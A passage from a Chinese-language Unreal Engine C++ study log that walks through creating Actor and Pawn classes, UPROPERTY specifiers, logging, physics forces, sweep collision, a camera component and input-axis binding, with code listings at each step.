    UMyObject::UMyObject()
    {

    }

    void UMyObject::MyFunction()
    {

    }

    ​保存并编译。

    png

    ​此时在对应的蓝图中就可以创建相关的节点。

    png

    ​试一试!

    306-使用 UE_LOG 打印日志与在蓝图中实例化继承于 Object 的类

    ​修改 MyObject.h,宏中可以定义变量/函数属于哪个 Category

    #pragma once

    #include "CoreMinimal.h"
    #include "UObject/NoExportTypes.h"
    #include "MyObject.generated.h"

    /**
    *
    */
    UCLASS(Blueprintable)
    class MYPROJECT8_API UMyObject : public UObject
    {
    GENERATED_BODY()

    public:

    UMyObject();

    UPROPERTY(BlueprintReadWrite, Category = "My Variables")
    float MyFloat;

    UFUNCTION(BlueprintCallable, Category = "My Functions")
    void MyFunction();
    };

    MyObject.cpp 中写 MyFunction() 的实现,UE_LOG() 可以向控制台输出信息:

    #include "MyObject.h"

    UMyObject::UMyObject()
    {
    MyFloat = 0.0f;
    }

    void UMyObject::MyFunction()
    {
    UE_LOG(LogTemp, Log, TEXT("Hello World!"));
    UE_LOG(LogTemp, Warning, TEXT("Hello World!"));
    UE_LOG(LogTemp, Error, TEXT("Hello World!"));
    }
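
    ​UE_LOG 还支持类似 printf 的格式化参数,例如(示意):

    UE_LOG(LogTemp, Warning, TEXT("MyFloat = %f, Name = %s"), MyFloat, *GetName());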

    png

    ​在关卡蓝图中,Construct Object from Class 可以将某个类实例化。

    png

    ​这么画关卡蓝图,实例化 BP_MyObject 类,调用其中的 MyFunction()

    png

    ​开跑!此时就会在 OutputLog 里输出相应信息。

    307-如何删除自定义的 C++ 类

    401-创建自己的 Actor 子类与学习类的命名规范

    png

    ​创建一个 Actor 的 C++ class。

    png

    ​路径保持默认(源教程在 Path 里添油加醋了个 /Actor,结果我这里编译出错,好像不太聪明的样子……算了我还是妥协好了;后来又想了想,可能要改一下 #include "MyActor.h" 的位置),之后创建好了 MyActor.h 和 MyActor.cpp。

    ​看一下 MyActor.cpp,感觉很像 Unity 里的 Start() 和 Update():

    #include "MyActor.h"

    // Sets default values
    AMyActor::AMyActor()
    {
    // Set this actor to call Tick() every frame. You can turn this off to improve performance if you don't need it.
    PrimaryActorTick.bCanEverTick = true;
    }

    // Called when the game starts or when spawned
    void AMyActor::BeginPlay()
    {
    Super::BeginPlay();
    }

    // Called every frame
    void AMyActor::Tick(float DeltaTime)
    {
    Super::Tick(DeltaTime);
    }
    • 派生自 Actor 的类带有 A 前缀,如 AController
    • 派生自 Object 的类带有 U 前缀,如 UComponent
    • Enums 的前缀是 E,如 EFortificationType
    • Interface 的前缀通常是 I,如 IAbilitySystemInterface
    • Template 的前缀是 T,如 TArray
    • 派生自 SWidget 的类 (Slate UI) 带有前缀 S,如 SButton
    • 其他类的前缀为字母 F,如 FVector

    ​看一看 MyActor.h 里的内容,虽然 UCLASS() 没有 Blueprintable,但是也可以执行 Create Blueprint class based on MyActor,这是因为所继承的类 AActor 自带 Blueprintable。

    #pragma once

    #include "CoreMinimal.h"
    #include "GameFramework/Actor.h"
    #include "MyActor.generated.h"

    UCLASS()
    class MYPROJECT8_API AMyActor : public AActor
    {
    GENERATED_BODY()

    public:
    // Sets default values for this actor's properties
    AMyActor();

    protected:
    // Called when the game starts or when spawned
    virtual void BeginPlay() override;

    public:
    // Called every frame
    virtual void Tick(float DeltaTime) override;
    };

    402-组件简介与使用蓝图类扩展代码的优点

    ​略。这个蓝图跟 Unity 里的 prefab 蛮像的。

    403-在 C++ 中创建静态网格组件

    ​编辑 MyActor.h 里的内容,声明一个变量 UStaticMeshComponent* MyStaticMesh

    #pragma once

    #include "CoreMinimal.h"
    #include "GameFramework/Actor.h"
    #include "MyActor.generated.h"

    UCLASS()
    class MYPROJECT8_API AMyActor : public AActor
    {
    GENERATED_BODY()

    public:
    // Sets default values for this actor's properties
    AMyActor();

    UPROPERTY(VisibleAnywhere, Category = "My Actor Components")
    UStaticMeshComponent* MyStaticMesh;

    protected:
    // Called when the game starts or when spawned
    virtual void BeginPlay() override;

    public:
    // Called every frame
    virtual void Tick(float DeltaTime) override;
    };

    ​编辑 MyActor.cpp 里的内容,在构造函数里设置 MyStaticMesh 里的值:

    #include "MyActor.h"

    // Sets default values
    AMyActor::AMyActor()
    {
    // Set this actor to call Tick() every frame. You can turn this off to improve performance if you don't need it.
    PrimaryActorTick.bCanEverTick = true;

    MyStaticMesh = CreateDefaultSubobject<UStaticMeshComponent>(TEXT("MyStaticMesh"));
    }

    // Called when the game starts or when spawned
    void AMyActor::BeginPlay()
    {
    Super::BeginPlay();
    }

    // Called every frame
    void AMyActor::Tick(float DeltaTime)
    {
    Super::Tick(DeltaTime);
    }

    png

    ​如此做,对应的蓝图里就会显示构造函数创建的 MyStaticMesh

    png

    ​也可以不用蓝图直接将定义的 C++ class 拖到关卡中。

    404-导入模型与布置场景

    ​略。

    405-使用 SetActorLocation 控制位置与宏参数 EditInstanceOnly 介绍

    修改 MyActor.h 的内容,添加一个 FVector 类型的变量 InitLocation,上面添加修饰宏 UPROPERTY(EditInstanceOnly, Category = "My Actor Properties | Vector"),让这个值可以在实例中编辑:

    #pragma once

    #include "CoreMinimal.h"
    #include "GameFramework/Actor.h"
    #include "MyActor.generated.h"

    UCLASS()
    class MYPROJECT8_API AMyActor : public AActor
    {
    GENERATED_BODY()

    public:
    // Sets default values for this actor's properties
    AMyActor();

    UPROPERTY(VisibleAnywhere, Category = "My Actor Components")
    UStaticMeshComponent* MyStaticMesh;

    UPROPERTY(EditInstanceOnly, Category = "My Actor Properties | Vector")
    FVector InitLocation;

    protected:
    // Called when the game starts or when spawned
    virtual void BeginPlay() override;

    public:
    // Called every frame
    virtual void Tick(float DeltaTime) override;
    };

    ​修改 MyActor.cpp 里的内容,在 BeginPlay() 中将 Actor 的坐标设为 InitLocation 的值。

    #include "MyActor.h"

    // Sets default values
    AMyActor::AMyActor()
    {
    // Set this actor to call Tick() every frame. You can turn this off to improve performance if you don't need it.
    PrimaryActorTick.bCanEverTick = true;

    MyStaticMesh = CreateDefaultSubobject<UStaticMeshComponent>(TEXT("MyStaticMesh"));
    InitLocation = FVector(0.0f);
    }

    // Called when the game starts or when spawned
    void AMyActor::BeginPlay()
    {
    Super::BeginPlay();

    SetActorLocation(InitLocation);
    }

    // Called every frame
    void AMyActor::Tick(float DeltaTime)
    {
    Super::Tick(DeltaTime);
    }

    png

    ​在蓝图实例中多了个设置 InitLocation 的地方,运行关卡会发现蓝图实例被正确地移动到了 InitLocation 的位置。

    406-VisibleInstanceOnly 与 EditDefaultsOnly

    ​修改 MyActor.h 里的内容,引入了两个新的宏参数:

    • VisibleInstanceOnly 只在实例中可见,不可编辑。
    • EditDefaultsOnly 只可在模板中编辑。

    ​给 bool 变量命名时加上前缀 b,UE 会自动识别,并在编辑器面板中把前缀去掉显示。

    #pragma once

    #include "CoreMinimal.h"
    #include "GameFramework/Actor.h"
    #include "MyActor.generated.h"

    UCLASS()
    class MYPROJECT8_API AMyActor : public AActor
    {
    GENERATED_BODY()

    public:
    // Sets default values for this actor's properties
    AMyActor();

    UPROPERTY(VisibleAnywhere, Category = "My Actor Components")
    UStaticMeshComponent* MyStaticMesh;

    UPROPERTY(EditInstanceOnly, Category = "My Actor Properties | Vector")
    FVector InitLocation;

    UPROPERTY(VisibleInstanceOnly, Category = "My Actor Properties | Vector")
    FVector PlacedLocation;

    UPROPERTY(EditDefaultsOnly, Category = "My Actor Properties | Vector")
    bool bGotoInitLocation;

    protected:
    // Called when the game starts or when spawned
    virtual void BeginPlay() override;

    public:
    // Called every frame
    virtual void Tick(float DeltaTime) override;
    };

    ​修改 MyActor.cpp 里的内容:

    #include "MyActor.h"

    // Sets default values
    AMyActor::AMyActor()
    {
    // Set this actor to call Tick() every frame. You can turn this off to improve performance if you don't need it.
    PrimaryActorTick.bCanEverTick = true;

    MyStaticMesh = CreateDefaultSubobject<UStaticMeshComponent>(TEXT("MyStaticMesh"));
    InitLocation = FVector(0.0f);
    PlacedLocation = FVector(0.0f);
    bGotoInitLocation = false;
    }

    // Called when the game starts or when spawned
    void AMyActor::BeginPlay()
    {
    Super::BeginPlay();

    PlacedLocation = GetActorLocation();
    if (bGotoInitLocation)
    SetActorLocation(InitLocation);
    }

    // Called every frame
    void AMyActor::Tick(float DeltaTime)
    {
    Super::Tick(DeltaTime);
    }

    png

    ​开跑!可以看到宏参数 VisibleAnywhere、EditInstanceOnly、VisibleInstanceOnly、EditDefaultsOnly 之间的区别。

    407-VisibleDefaultsOnly 与 EditAnywhere

    ​修改 MyActor.h 的内容,引入了两个新的宏参数:

    • VisibleDefaultsOnly 只在模板中可见(没有地方可以编辑,一般没什么卵用)。
    • EditAnywhere 在模板类和实例类中均可编辑。
    #pragma once

    #include "CoreMinimal.h"
    #include "GameFramework/Actor.h"
    #include "MyActor.generated.h"

    UCLASS()
    class MYPROJECT8_API AMyActor : public AActor
    {
    GENERATED_BODY()

    public:
    // Sets default values for this actor's properties
    AMyActor();

    UPROPERTY(VisibleAnywhere, Category = "My Actor Components")
    UStaticMeshComponent* MyStaticMesh;

    UPROPERTY(EditInstanceOnly, Category = "My Actor Properties | Vector")
    FVector InitLocation;

    UPROPERTY(VisibleInstanceOnly, Category = "My Actor Properties | Vector")
    FVector PlacedLocation;

    UPROPERTY(EditDefaultsOnly, Category = "My Actor Properties | Vector")
    bool bGotoInitLocation;

    UPROPERTY(VisibleDefaultsOnly, Category = "My Actor Properties | Vector")
    FVector WorldOrigin;

    UPROPERTY(EditAnywhere, Category = "My Actor Properties | Vector")
    FVector TickLoactionOffset;

    UPROPERTY(EditAnywhere, Category = "My Actor Properties | Vector")
    bool bShouldMove;

    protected:
    // Called when the game starts or when spawned
    virtual void BeginPlay() override;

    public:
    // Called every frame
    virtual void Tick(float DeltaTime) override;
    };

    ​修改 MyActor.cpp 里的内容:

    #include "MyActor.h"

    // Sets default values
    AMyActor::AMyActor()
    {
    // Set this actor to call Tick() every frame. You can turn this off to improve performance if you don't need it.
    PrimaryActorTick.bCanEverTick = true;

    MyStaticMesh = CreateDefaultSubobject<UStaticMeshComponent>(TEXT("MyStaticMesh"));
    InitLocation = FVector(0.0f);
    PlacedLocation = FVector(0.0f);
    bGotoInitLocation = false;
    WorldOrigin = FVector(0.0f);
    TickLoactionOffset = FVector(0.0f);
    bShouldMove = false;
    }

    // Called when the game starts or when spawned
    void AMyActor::BeginPlay()
    {
    Super::BeginPlay();

    PlacedLocation = GetActorLocation();
    if (bGotoInitLocation)
    SetActorLocation(InitLocation);
    }

    // Called every frame
    void AMyActor::Tick(float DeltaTime)
    {
    Super::Tick(DeltaTime);

    if (bShouldMove)
    {
    AddActorLocalOffset(TickLoactionOffset);
    }
    }

    png

    ​开跑!此时实例会每帧沿方向 (0.1, 0.1, 0.1) 移动。

    408-在编辑器中限制输入值的范围与不要将组件指针设为 EditAnywhere

    不要将组件指针设为 EditAnywhere

    UPROPERTY(EditAnywhere, Category = "My Actor Components")
    UStaticMeshComponent* MyStaticMesh;

    不要这么做!生成的界面会十分复杂,不友好!


    ​修改 MyActor.hTickLoactionOffset 的宏,如此做将在面板中限制变量的取值范围:

    UPROPERTY(EditAnywhere, Category = "My Actor Properties | Vector", meta = (ClampMin = -5.0f, ClampMax = 5.0f, UIMin = -5.0f, UIMax = 5.0f))
    FVector TickLoactionOffset;

    png

    409-简单碰撞与复杂碰撞

    ​教你认识 UE 里的碰撞,分为简单碰撞与复杂碰撞。

    png

    410-模拟物理与重力

    png

    ​物体中若打开了 Physics 下的 Simulate Physics,则会开启物理。

    png

    ​给这个物体加一个简单的凸包碰撞。

    png

    ​开跑!按下反引号(`)键可以打开控制台,输入 show Collision 即可在视图中显示碰撞的具体位置。

    411-通过代码增加力与力矩

    ​修改 MyActor.h 里的内容,添加力 FVector InitForce、力矩 FVector InitTorque,以及“施加时忽略质量、直接改变加速度”的开关 bAccelChange:

    #pragma once

    #include "CoreMinimal.h"
    #include "GameFramework/Actor.h"
    #include "MyActor.generated.h"

    UCLASS()
    class MYPROJECT8_API AMyActor : public AActor
    {
    GENERATED_BODY()

    public:
    // Sets default values for this actor's properties
    AMyActor();

    UPROPERTY(VisibleAnywhere, Category = "My Actor Components")
    UStaticMeshComponent* MyStaticMesh;

    UPROPERTY(EditInstanceOnly, Category = "My Actor Properties | Vector")
    FVector InitLocation;

    UPROPERTY(VisibleInstanceOnly, Category = "My Actor Properties | Vector")
    FVector PlacedLocation;

    UPROPERTY(EditDefaultsOnly, Category = "My Actor Properties | Vector")
    bool bGotoInitLocation;

    UPROPERTY(VisibleDefaultsOnly, Category = "My Actor Properties | Vector")
    FVector WorldOrigin;

    UPROPERTY(EditAnywhere, Category = "My Actor Properties | Vector", meta = (ClampMin = -5.0f, ClampMax = 5.0f, UIMin = -5.0f, UIMax = 5.0f))
    FVector TickLoactionOffset;

    UPROPERTY(EditAnywhere, Category = "My Actor Properties | Vector")
    bool bShouldMove;

    UPROPERTY(EditInstanceOnly, Category = "My Actor Properties | Physics")
    FVector InitForce;

    UPROPERTY(EditInstanceOnly, Category = "My Actor Properties | Physics")
    FVector InitTorque;

    UPROPERTY(EditInstanceOnly, Category = "My Actor Properties | Physics")
    bool bAccelChange;

    protected:
    // Called when the game starts or when spawned
    virtual void BeginPlay() override;

    public:
    // Called every frame
    virtual void Tick(float DeltaTime) override;
    };

    ​修改 MyActor.cpp 里的内容:

    #include "MyActor.h"
    #include "Components/StaticMeshComponent.h"

    // Sets default values
    AMyActor::AMyActor()
    {
    // Set this actor to call Tick() every frame. You can turn this off to improve performance if you don't need it.
    PrimaryActorTick.bCanEverTick = true;

    MyStaticMesh = CreateDefaultSubobject<UStaticMeshComponent>(TEXT("MyStaticMesh"));
    InitLocation = FVector(0.0f);
    PlacedLocation = FVector(0.0f);
    bGotoInitLocation = false;
    WorldOrigin = FVector(0.0f);
    TickLoactionOffset = FVector(0.0f);
    bShouldMove = false;
    InitForce = FVector(0.0f);
    InitTorque = FVector(0.0f);
    bAccelChange = false;
    }

    // Called when the game starts or when spawned
    void AMyActor::BeginPlay()
    {
    Super::BeginPlay();

    PlacedLocation = GetActorLocation();
    if (bGotoInitLocation)
    SetActorLocation(InitLocation);
    MyStaticMesh->AddForce(InitForce, NAME_None, bAccelChange);
    MyStaticMesh->AddTorque(InitTorque, NAME_None, bAccelChange);
    }

    // Called every frame
    void AMyActor::Tick(float DeltaTime)
    {
    Super::Tick(DeltaTime);

    if (bShouldMove)
    {
    AddActorLocalOffset(TickLoactionOffset);
    }
    }

    MyStaticMesh-> 的这些成员函数默认不可用,需从官方文档(UStaticMeshComponent | Unreal Engine 5.2 Documentation)查找 UStaticMeshComponent 的属性,得知需要引入 #include "Components/StaticMeshComponent.h"。

    png

    ​此时在实例类中便可设置给对象初始化的力和力矩。

    png

    412-使用 Sweep 在不开启模拟物理的情况下进行碰撞

    ​在没有 Simulate Physics 的情况下,默认的碰撞是不会有效的,但是可以打开 Sweep 在不开启模拟物理的情况下进行碰撞。

    png

    ​修改 MyActor.cpp,将移动改为 AddActorLocalOffset(TickLoactionOffset, true); 便可在不开启模拟物理的情况下进行碰撞:

    #include "MyActor.h"
    #include "Components/StaticMeshComponent.h"

    // Sets default values
    AMyActor::AMyActor()
    {
    // Set this actor to call Tick() every frame. You can turn this off to improve performance if you don't need it.
    PrimaryActorTick.bCanEverTick = true;

    MyStaticMesh = CreateDefaultSubobject<UStaticMeshComponent>(TEXT("MyStaticMesh"));
    InitLocation = FVector(0.0f);
    PlacedLocation = FVector(0.0f);
    bGotoInitLocation = false;
    WorldOrigin = FVector(0.0f);
    TickLoactionOffset = FVector(0.0f);
    bShouldMove = false;
    InitForce = FVector(0.0f);
    InitTorque = FVector(0.0f);
    bAccelChange = false;
    }

    // Called when the game starts or when spawned
    void AMyActor::BeginPlay()
    {
    Super::BeginPlay();

    PlacedLocation = GetActorLocation();
    if (bGotoInitLocation)
    SetActorLocation(InitLocation);
    //MyStaticMesh->AddForce(InitForce, NAME_None, bAccelChange);
    //MyStaticMesh->AddTorque(InitTorque, NAME_None, bAccelChange);
    }

    // Called every frame
    void AMyActor::Tick(float DeltaTime)
    {
    Super::Tick(DeltaTime);

    if (bShouldMove)
    {
    AddActorLocalOffset(TickLoactionOffset, true);
    }
    }

    413-碰撞通道与击中信息

    png

    Collision 里可以设置哪些碰撞通道有效;必须两个物体的响应均为 Block 才可以互相阻挡。
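
    ​若想在 C++ 中(而不是在面板里)配置碰撞响应,可以参考下面的示意写法(假设放在构造函数中,所用的都是 UPrimitiveComponent 的现成接口):

    // 示意:开启“查询 + 物理”碰撞,并把对 Pawn 通道的响应设为 Block
    MyStaticMesh->SetCollisionEnabled(ECollisionEnabled::QueryAndPhysics);
    MyStaticMesh->SetCollisionResponseToChannel(ECC_Pawn, ECR_Block);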


    ​修改 MyActor.cpp 里的内容,定义 FHitResult HitResult,并调用 AddActorLocalOffset(TickLoactionOffset, true, &HitResult),即可获取碰撞信息:

    #include "MyActor.h"
    #include "Components/StaticMeshComponent.h"

    // Sets default values
    AMyActor::AMyActor()
    {
    // Set this actor to call Tick() every frame. You can turn this off to improve performance if you don't need it.
    PrimaryActorTick.bCanEverTick = true;

    MyStaticMesh = CreateDefaultSubobject<UStaticMeshComponent>(TEXT("MyStaticMesh"));
    InitLocation = FVector(0.0f);
    PlacedLocation = FVector(0.0f);
    bGotoInitLocation = false;
    WorldOrigin = FVector(0.0f);
    TickLoactionOffset = FVector(0.0f);
    bShouldMove = false;
    InitForce = FVector(0.0f);
    InitTorque = FVector(0.0f);
    bAccelChange = false;
    }

    // Called when the game starts or when spawned
    void AMyActor::BeginPlay()
    {
    Super::BeginPlay();

    PlacedLocation = GetActorLocation();
    if (bGotoInitLocation)
    SetActorLocation(InitLocation);
    //MyStaticMesh->AddForce(InitForce, NAME_None, bAccelChange);
    //MyStaticMesh->AddTorque(InitTorque, NAME_None, bAccelChange);
    }

    // Called every frame
    void AMyActor::Tick(float DeltaTime)
    {
    Super::Tick(DeltaTime);

    if (bShouldMove)
    {
    FHitResult HitResult;

    AddActorLocalOffset(TickLoactionOffset, true, &HitResult);
    UE_LOG(LogTemp, Warning, TEXT("X: %f, Y: %f, Z: %f"), HitResult.Location.X, HitResult.Location.Y, HitResult.Location.Z);
    }
    }

    png

    ​开跑!Output Log 将输出碰撞信息。
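
    ​FHitResult 里除了 Location 还有不少有用的字段,例如被击中的 Actor 和撞击法线。下面是一段示意代码(假设放在上面 Tick 的 if (bShouldMove) 分支里):

    // 示意:读取 FHitResult 的其他字段
    if (HitResult.bBlockingHit && HitResult.GetActor())
    {
    UE_LOG(LogTemp, Warning, TEXT("Hit: %s, ImpactNormal: %s"),
    *HitResult.GetActor()->GetName(),
    *HitResult.ImpactNormal.ToString());
    }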

    414-其他常用函数与可探索部分

    ​略。

    501-创建自己的 Pawn 类、自己的根组件并将静态网格组件附加到其上

    png

    ​创建一个 Pawn 类型的 C++ Class,获得 MyPawn.hMyPawn.cpp

    ​编辑 MyPawn.h,定义变量 class UStaticMeshComponent* MyStaticMesh;,这里的 class 前缀是前向声明写法,可加可不加:

    #include "CoreMinimal.h"
    #include "GameFramework/Pawn.h"
    #include "MyPawn.generated.h"

    UCLASS()
    class MYPROJECT8_API AMyPawn : public APawn
    {
    GENERATED_BODY()

    public:
    // Sets default values for this pawn's properties
    AMyPawn();

    UPROPERTY(VisibleAnywhere, Category = "My Pawn Components")
    class UStaticMeshComponent* MyStaticMesh;

    protected:
    // Called when the game starts or when spawned
    virtual void BeginPlay() override;

    public:
    // Called every frame
    virtual void Tick(float DeltaTime) override;

    // Called to bind functionality to input
    virtual void SetupPlayerInputComponent(class UInputComponent* PlayerInputComponent) override;

    };

    ​编辑 MyPawn.cpp,设置 RootComponent 的值(模板自带),设置 MyStaticMesh 的值并将其设为 RootComponent 的子节点:

    #include "MyPawn.h"
    #include "Components/StaticMeshComponent.h"

    // Sets default values
    AMyPawn::AMyPawn()
    {
    // Set this pawn to call Tick() every frame. You can turn this off to improve performance if you don't need it.
    PrimaryActorTick.bCanEverTick = true;

    RootComponent = CreateDefaultSubobject<USceneComponent>(TEXT("RootComponent"));
    MyStaticMesh = CreateDefaultSubobject<UStaticMeshComponent>(TEXT("MyStaticMesh"));
    MyStaticMesh->SetupAttachment(GetRootComponent());
    }

    // Called when the game starts or when spawned
    void AMyPawn::BeginPlay()
    {
    Super::BeginPlay();
    }

    // Called every frame
    void AMyPawn::Tick(float DeltaTime)
    {
    Super::Tick(DeltaTime);
    }

    // Called to bind functionality to input
    void AMyPawn::SetupPlayerInputComponent(UInputComponent* PlayerInputComponent)
    {
    Super::SetupPlayerInputComponent(PlayerInputComponent);
    }

    ​编译。Create Blueprint class based on MyPawn

    png

    ​开跑!

    png

    502-为自己的 Pawn 设置相机组件

    ​修改 MyPawn.h,定义一个新的变量 class UCameraComponent* MyCamera;

    #pragma once

    #include "CoreMinimal.h"
    #include "GameFramework/Pawn.h"
    #include "MyPawn.generated.h"

    UCLASS()
    class MYPROJECT8_API AMyPawn : public APawn
    {
    GENERATED_BODY()

    public:
    // Sets default values for this pawn's properties
    AMyPawn();

    UPROPERTY(VisibleAnywhere, Category = "My Pawn Components")
    class UStaticMeshComponent* MyStaticMesh;

    UPROPERTY(VisibleAnywhere, Category = "My Pawn Components")
    class UCameraComponent* MyCamera;

    protected:
    // Called when the game starts or when spawned
    virtual void BeginPlay() override;

    public:
    // Called every frame
    virtual void Tick(float DeltaTime) override;

    // Called to bind functionality to input
    virtual void SetupPlayerInputComponent(class UInputComponent* PlayerInputComponent) override;

    };

    ​修改 MyPawn.cpp,设置好 MyCamera 的属性:

    #include "MyPawn.h"
    #include "Components/StaticMeshComponent.h"
    #include "Camera/CameraComponent.h"

    // Sets default values
    AMyPawn::AMyPawn()
    {
    // Set this pawn to call Tick() every frame. You can turn this off to improve performance if you don't need it.
    PrimaryActorTick.bCanEverTick = true;

    RootComponent = CreateDefaultSubobject<USceneComponent>(TEXT("RootComponent"));
    MyStaticMesh = CreateDefaultSubobject<UStaticMeshComponent>(TEXT("MyStaticMesh"));
    MyStaticMesh->SetupAttachment(GetRootComponent());

    MyCamera = CreateDefaultSubobject<UCameraComponent>(TEXT("MyCamera"));
    MyCamera->SetupAttachment(GetRootComponent());

    MyCamera->SetRelativeLocation(FVector(-300.0f, 0.0f, 300.0f));
    MyCamera->SetRelativeRotation(FRotator(-45.0f, 0.0f, 0.0f));
    }

    // Called when the game starts or when spawned
    void AMyPawn::BeginPlay()
    {
    Super::BeginPlay();

    }

    // Called every frame
    void AMyPawn::Tick(float DeltaTime)
    {
    Super::Tick(DeltaTime);

    }

    // Called to bind functionality to input
    void AMyPawn::SetupPlayerInputComponent(UInputComponent* PlayerInputComponent)
    {
    Super::SetupPlayerInputComponent(PlayerInputComponent);

    }

    ​开跑!

    png

    503-设置 GameMode 并自动持有 Pawn

    png

    ​对于 C++ Classes 下的 GameModeBase,创建游戏模式蓝图 Create Blueprint class based on ...

    png

    ​在创建的蓝图中的 Class Defaults,将 Default Pawn Class 设置为 BP_MyPawn

    png
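
    ​也可以不走蓝图,直接在自己的 GameMode C++ 类的构造函数里指定默认 Pawn。下面是示意代码,假设项目里已有一个名为 AMyGameModeBase 的 GameModeBase 子类:

    #include "MyGameModeBase.h" // 假设的文件名
    #include "MyPawn.h"

    AMyGameModeBase::AMyGameModeBase()
    {
    // DefaultPawnClass 是 AGameModeBase 的成员,决定开局生成并持有哪个 Pawn
    DefaultPawnClass = AMyPawn::StaticClass();
    }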

    ​关卡中的 World Settings,设置好 GameMode Override

    png

    BP_MyPawn 中设置好 Auto Possess PlayerPlayer 0,或者直接修改 MyPawn.cpp,添加语句 AutoPossessPlayer = EAutoReceiveInput::Player0;

    #include "MyPawn.h"
    #include "Components/StaticMeshComponent.h"
    #include "Camera/CameraComponent.h"

    // Sets default values
    AMyPawn::AMyPawn()
    {
    // Set this pawn to call Tick() every frame. You can turn this off to improve performance if you don't need it.
    PrimaryActorTick.bCanEverTick = true;

    RootComponent = CreateDefaultSubobject<USceneComponent>(TEXT("RootComponent"));
    MyStaticMesh = CreateDefaultSubobject<UStaticMeshComponent>(TEXT("MyStaticMesh"));
    MyStaticMesh->SetupAttachment(GetRootComponent());

    MyCamera = CreateDefaultSubobject<UCameraComponent>(TEXT("MyCamera"));
    MyCamera->SetupAttachment(GetRootComponent());

    MyCamera->SetRelativeLocation(FVector(-300.0f, 0.0f, 300.0f));
    MyCamera->SetRelativeRotation(FRotator(-45.0f, 0.0f, 0.0f));

    AutoPossessPlayer = EAutoReceiveInput::Player0;
    }

    // Called when the game starts or when spawned
    void AMyPawn::BeginPlay()
    {
    Super::BeginPlay();

    }

    // Called every frame
    void AMyPawn::Tick(float DeltaTime)
    {
    Super::Tick(DeltaTime);

    }

    // Called to bind functionality to input
    void AMyPawn::SetupPlayerInputComponent(UInputComponent* PlayerInputComponent)
    {
    Super::SetupPlayerInputComponent(PlayerInputComponent);

    }

    504-按键映射与轴事件绑定

    png

    ​在 Project Settings 里设置按键映射。

    ​在 MyPawn.h 里定义私有的移动函数:

    #pragma once

    #include "CoreMinimal.h"
    #include "GameFramework/Pawn.h"
    #include "MyPawn.generated.h"

    UCLASS()
    class MYPROJECT8_API AMyPawn : public APawn
    {
    GENERATED_BODY()

    public:
    // Sets default values for this pawn's properties
    AMyPawn();

    UPROPERTY(VisibleAnywhere, Category = "My Pawn Components")
    class UStaticMeshComponent* MyStaticMesh;

    UPROPERTY(VisibleAnywhere, Category = "My Pawn Components")
    class UCameraComponent* MyCamera;

    protected:
    // Called when the game starts or when spawned
    virtual void BeginPlay() override;

    public:
    // Called every frame
    virtual void Tick(float DeltaTime) override;

    // Called to bind functionality to input
    virtual void SetupPlayerInputComponent(class UInputComponent* PlayerInputComponent) override;

    private:
    void MoveForward(float Value);
    void MoveRight(float Value);
    };

    MyPawn.cpp 里将按键映射与轴事件绑定:

    #include "MyPawn.h"
    #include "Components/StaticMeshComponent.h"
    #include "Camera/CameraComponent.h"
    #include "Components/InputComponent.h"

    // Sets default values
    AMyPawn::AMyPawn()
    {
    // Set this pawn to call Tick() every frame. You can turn this off to improve performance if you don't need it.
    PrimaryActorTick.bCanEverTick = true;

    RootComponent = CreateDefaultSubobject<USceneComponent>(TEXT("RootComponent"));
    MyStaticMesh = CreateDefaultSubobject<UStaticMeshComponent>(TEXT("MyStaticMesh"));
    MyStaticMesh->SetupAttachment(GetRootComponent());

    MyCamera = CreateDefaultSubobject<UCameraComponent>(TEXT("MyCamera"));
    MyCamera->SetupAttachment(GetRootComponent());

    MyCamera->SetRelativeLocation(FVector(-300.0f, 0.0f, 300.0f));
    MyCamera->SetRelativeRotation(FRotator(-45.0f, 0.0f, 0.0f));

    AutoPossessPlayer = EAutoReceiveInput::Player0;
    }

    // Called when the game starts or when spawned
    void AMyPawn::BeginPlay()
    {
    Super::BeginPlay();

    }

    // Called every frame
    void AMyPawn::Tick(float DeltaTime)
    {
    Super::Tick(DeltaTime);

    }

    // Called to bind functionality to input
    void AMyPawn::SetupPlayerInputComponent(UInputComponent* PlayerInputComponent)
    {
    Super::SetupPlayerInputComponent(PlayerInputComponent);

    PlayerInputComponent->BindAxis(TEXT("MoveForward"), this, &AMyPawn::MoveForward);
    PlayerInputComponent->BindAxis(TEXT("MoveRight"), this, &AMyPawn::MoveRight);
    }

    void AMyPawn::MoveForward(float Value)
    {
    }

    void AMyPawn::MoveRight(float Value)
    {
    }

    505-使用 Tick 的移动

    ​修改 MyPawn.h 里的内容,定义变量 MaxSpeed 与 Velocity:

    #pragma once

    #include "CoreMinimal.h"
    #include "GameFramework/Pawn.h"
    #include "MyPawn.generated.h"

    UCLASS()
    class MYPROJECT8_API AMyPawn : public APawn
    {
    GENERATED_BODY()

    public:
    // Sets default values for this pawn's properties
    AMyPawn();

    UPROPERTY(VisibleAnywhere, Category = "My Pawn Components")
    class UStaticMeshComponent* MyStaticMesh;

    UPROPERTY(VisibleAnywhere, Category = "My Pawn Components")
    class UCameraComponent* MyCamera;

    UPROPERTY(EditAnywhere, Category = "My Pawn Movement")
    float MaxSpeed;

    protected:
    // Called when the game starts or when spawned
    virtual void BeginPlay() override;

    public:
    // Called every frame
    virtual void Tick(float DeltaTime) override;

    // Called to bind functionality to input
    virtual void SetupPlayerInputComponent(class UInputComponent* PlayerInputComponent) override;

    private:
    void MoveForward(float Value);
    void MoveRight(float Value);
    FVector Velocity;
    };

    ​修改 MyPawn.cpp 里的内容,使得物体能够随着输入而移动:

    #include "MyPawn.h"
    #include "Components/StaticMeshComponent.h"
    #include "Camera/CameraComponent.h"
    #include "Components/InputComponent.h"

    // Sets default values
    AMyPawn::AMyPawn()
    {
    // Set this pawn to call Tick() every frame. You can turn this off to improve performance if you don't need it.
    PrimaryActorTick.bCanEverTick = true;

    RootComponent = CreateDefaultSubobject<USceneComponent>(TEXT("RootComponent"));
    MyStaticMesh = CreateDefaultSubobject<UStaticMeshComponent>(TEXT("MyStaticMesh"));
    MyStaticMesh->SetupAttachment(GetRootComponent());

    MyCamera = CreateDefaultSubobject<UCameraComponent>(TEXT("MyCamera"));
    MyCamera->SetupAttachment(GetRootComponent());

    MyCamera->SetRelativeLocation(FVector(-300.0f, 0.0f, 300.0f));
    MyCamera->SetRelativeRotation(FRotator(-45.0f, 0.0f, 0.0f));

    AutoPossessPlayer = EAutoReceiveInput::Player0;

    MaxSpeed = 300.0f;
    Velocity = FVector::ZeroVector;
    }

    // Called when the game starts or when spawned
    void AMyPawn::BeginPlay()
    {
    Super::BeginPlay();

    }

    // Called every frame
    void AMyPawn::Tick(float DeltaTime)
    {
    Super::Tick(DeltaTime);
    AddActorLocalOffset(Velocity * DeltaTime, true);
    }

    // Called to bind functionality to input
